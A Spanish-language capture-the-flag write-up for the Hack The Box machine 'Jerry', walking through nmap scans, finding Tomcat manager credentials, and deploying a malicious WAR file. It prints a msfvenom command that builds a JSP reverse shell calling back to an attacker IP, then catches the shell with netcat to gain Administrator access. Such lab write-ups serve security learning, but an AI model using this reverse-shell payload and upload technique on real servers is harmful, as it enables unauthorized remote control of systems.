Información de la máquina.
| Contenido | Descripción |
|---|---|
| OS: |  |
| Dificultad: | Facil |
| Puntos: | 20 |
| Lanzamiento: | 30-Junio-2018 |
| IP: | 10.10.10.95 |
| Primera sangre de usuario: | echthros |
| Primera sangre de system: | echthros |
| Creador: | mrh4sh |
Reconocimiento.
Como siempre comenzaremos con un escaneo a los 65535 puertos de la máquina para poder encontrar cuales son los puertos abiertos.
1
2
3
4
5
6
7
8
9
10
intrusionz3r0@kali:~$ nmap -p- --open -T5 -n -oG nmapScanAllPorts jerry.htb -Pn --min-rate 2000
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 22:48 CDT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.22s latency).
Not shown: 65534 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 66.11 seconds
Una vez terminado el escaneo lanzare scripts básicos de enumeración para detectar el servicio y la versión que se ejecuta bajo este puerto.
1
2
3
4
5
6
7
8
9
10
11
12
13
intrusionz3r0@kali:~$ nmap -sCV -p8080 -oN targeted jerry.htb -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 22:51 CDT
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.68 seconds
El escaneo determino lo siguiente:
- Puerto 8080 con servicio
tomcat.
Rápidamente abro mi navegador y me dirijo a la página web.
Nos encontramos con la página por defecto de tomcat.
Enumeración.
Si nos vamos a Manager APP se nos mostrara un panel de login.
Si colocamos cualquier cosa como credenciales el servidor nos responderá con un código de estado 401.
Esto nos revelara lo que parece ser unas credenciales de acceso.
Cuando pruebo las credenciales en el panel de login, me autentica correctamente y accedemos al portal.
Explotación
Como atacantes necesitamos buscar vías de explotación, en este caso si continuamos bajando encontraremos un apartado donde nosotros podremos subir archivos war al servidor.
¿Que es un archivo war? Un archivo WAR es un archivo JAR utilizado para distribuir una colección de JavaServer Pages, servlets, clases Java, archivos XML, bibliotecas de tags y páginas web estáticas que juntos constituyen una aplicación web.
Por lo tanto esta es nuestra via de explotación, lo que haremos será lo siguiente:
- Haremos uso de la herramienta
msfvenompara crear un reverse shell en formato war. - Subiremos el archivo malicioso.
- Ejecutamos nuestro archivo.
Creamos el payload.
1
intrusionz3r0@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.28 LPORT=1234 -f war > shell.war
Subimos el archivo al servidor.
Shell como Administrador.
Dejamos nuestro netcat a la escucha de cualquier conexión entrante y ejecutamos nuestro payload dirigiéndonos a http://jerry.htb:8080/shell/.
¡¡Somos Administradores!!
Espero te haya gustado, recuerda seguirme en mis redes sociales para estar al pendiente de todo mi contenido.